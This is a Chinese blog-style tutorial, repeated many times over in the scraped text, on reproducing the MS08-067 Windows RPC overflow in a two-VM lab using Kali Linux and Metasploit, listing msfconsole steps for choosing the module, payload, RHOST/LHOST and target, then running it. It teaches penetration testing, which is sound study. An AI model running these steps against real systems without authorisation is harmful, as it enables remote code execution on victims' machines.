Kali Linux渗透实战-MS08-067漏洞攻防实战窍门

感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088.html
Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

一、MS08-067是什么

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

二、影响操作系统

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、渗透环境准备

1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

五、渗透测试实战

1、打开postgresql数据库服务器

service postgresql start

初始化数据库

msfdb init

2、进入MSF终端

输入:msfconsole

3、搜索漏洞模块的名称和信息

search ms08-067

4、加载漏洞模块

use + 漏洞模块

5、列出该漏洞模块下可以使用的载荷

show payloads

6、设置攻击载荷

set payload + 载荷名称

7、显示配置选项

show options

8、设置目标地址

set RHOST + IP地址

9、设置本地地址

set LHOST + IP地址

10、列出所有支持的目标平台

show targets

11、选择靶机

set target + 数值

12、执行攻击

run

原文地址:https://www.cnblogs.com/lihanlin/p/12582008.html